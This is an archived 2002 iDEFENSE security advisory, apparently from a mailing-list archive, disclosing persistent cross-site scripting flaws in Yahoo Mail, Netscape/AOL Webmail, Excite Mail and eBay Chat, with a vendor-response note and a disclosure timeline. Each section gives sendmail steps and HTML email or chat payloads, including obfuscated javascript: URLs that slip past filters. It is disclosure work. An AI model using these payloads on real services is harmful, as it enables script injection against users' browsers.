lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <3D60AED5.1818.242E38F7@localhost>
From: dendler at idefense.com (David Endler)
Subject: iDEFENSE Security Advisory: Cross-Site Scripting Vulnerabilities in Popular Web Applications

iDEFENSE Security Advisory 08.19.2002 
Cross-Site Scripting (XSS) Vulnerabilities in Popular Web 
Applications

Yahoo Mail	http://mail.yahoo.com
Netscape Mail	http://webmail.netscape.com
AOL Webmail	http://webmail.aol.com (same as Netscape Mail)
Excite Mail	http://mail.excite.com
eBay Chat 	http://pages.ebay.com/community/chat/index.html


DESCRIPTION 

Many Web Applications generate dynamic HTML web pages using 
user-submitted data and other sources of "untrusted content." 
Web Applications not meticulously filtering this untrusted 
content before presenting the web page to the user may 
allow for the manipulation of the web page and its content 
interpretation by a web browser.

This issue becomes dangerous when untrusted content is able to 
be inserted into a dynamic HTML web page via a web application 
or other means, causing the content to execute potentially 
malicious code within a users browser with the exact same 
privileges of the ligitimate web server.

Some Web Applications such as Yahoo Mail and others, already 
meticulously filter incoming untrusted data before the content 
reaches their users. However, given the loose interpretation 
of HTML/JavaScript/VBScript etc. by various web browsers, 
obfuscated content may elude the current filters and execute 
within the users browser environment.

Allowing the attacker to target users almost instantly without 
relying on the user performing any activities other than 
normal usage. All vulnerabilties affect either Microsoft 
Internet Explorer Browser or Netscape or both. These types of 
XSS vulnerabilities are usually classified as "constant-
state", as they exist persistently for more than just one HTTP 
request.  More detailed XSS exploitation scenarios 
are detailed in an iDEFENSE paper available at 
http://www.idefense.com/XSS.html.


ANALYSIS

*** Yahoo Mail ***

The following XSS vulnerability only existed for Netscape 4.x 
browsers (see Vendor 
Response, this issue in Yahoo has since been addressed):

bash$ sendmail -t target@...oo.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@....com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<ILAYER SRC="script.js"></ILAYER>


</BODY></HTML>
.
--------------------------------------------------



*** Netscape/AOL Webmail ***

This XSS vulnerability exists in Netscape Mail 
(webmail.netscape.com) and AOL Webmail (webmail.aol.com).  The 
following XSS behavior can be caused in both IE 5.x/6.x and 
Netscape 4.x:

bash$ sendmail -t target@...scape.net

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@....com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<IMG SRC="javasc&#X0A;ript:alert('test');">

</BODY></HTML>
.
--------------------------------------------------



*** Excite Webmail ***

It would seem that Excite does not perform any filtering of 
HTML/SCRIPT whatsoever.  The following XSS behavior can be 
caused in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target@...ite.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@....com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<SCRIPT>alert(document.domain);</SCRIPT>

</BODY></HTML>
.
--------------------------------------------------



*** eBay Chat ***

While you are logged in as an eBay user, place the text sting 
below within the chat text field and click submit. The message 
will appear within the main chat text message and will execute 
in a user's browser when read. The following XSS behavior can 
be caused in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------
<IMG SRC="javasc&#X0A;ript:alert(document.domain);">
----------------------------------------------------



DISCOVERY CREDIT

Jeremiah Grossman (jeremiah@...tehatsec.com)
Lex Arquette (lex@...tehatsec.com)


VENDOR RESPONSE

July 16, 2002 - Scott Renfro (scottr@...oo-inc.com), title 
"Paranoid Yahoo", responded and issue was fixed.


DISCLOSURE TIMELINE

June 27, 2002 		Exclusively Disclosed to iDEFENSE
July 16, 2002		Ebay, AOL/Netscape, Yahoo, and Excite notified
July 16, 2002		iDEFENSE Client Disclosure
August 11, 2002		Second notice given to Excite, 
AOL/Netscape, and eBay 
through web customer service suggestion systems
August 19, 2002		Still no response from Excite, 
AOL/Netscape, or eBay - Public Disclosure




http://www.idefense.com/contributor.html

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@...fense.com
www.idefense.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ